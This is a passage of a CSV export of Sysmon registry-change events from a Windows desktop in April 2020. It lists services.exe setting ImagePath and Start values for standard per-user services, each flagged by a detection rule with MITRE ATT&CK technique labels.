{df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.556",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.632538600Z"",""eventRecordID"":""597"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 12:33:19.544",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.632238400Z"",""eventRecordID"":""596"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.529",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.631014400Z"",""eventRecordID"":""595"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 12:33:19.495",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.630544700Z"",""eventRecordID"":""594"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.480",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.629298800Z"",""eventRecordID"":""593"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow -p""" +"Apr 24, 2020 @ 12:33:19.468",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.628979200Z"",""eventRecordID"":""592"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.454",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.627580800Z"",""eventRecordID"":""591"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\CredentialEnrollmentManager.exe\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\CredentialEnrollmentManager.exe""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3f376\ImagePath +Details: C:\Windows\system32\CredentialEnrollmentManager.exe""" +"Apr 24, 2020 @ 12:33:19.431",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.626741700Z"",""eventRecordID"":""590"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.402",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.625283900Z"",""eventRecordID"":""589"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 12:33:19.363",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.624949500Z"",""eventRecordID"":""588"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.324",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.622707100Z"",""eventRecordID"":""587"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:33:19.289",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.622061000Z"",""eventRecordID"":""586"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_3f376\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_3f376\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_3f376\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 12:33:19.244",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.621222700Z"",""eventRecordID"":""585"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k ClipboardSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p""" +"Apr 24, 2020 @ 12:33:19.231",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.620790800Z"",""eventRecordID"":""584"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.216",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.619985500Z"",""eventRecordID"":""583"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.570\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k LocalService -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.570"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.570 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k LocalService -p""" +"Apr 24, 2020 @ 12:33:19.199",9,"ATT&CK T1058:Registry edit for new 
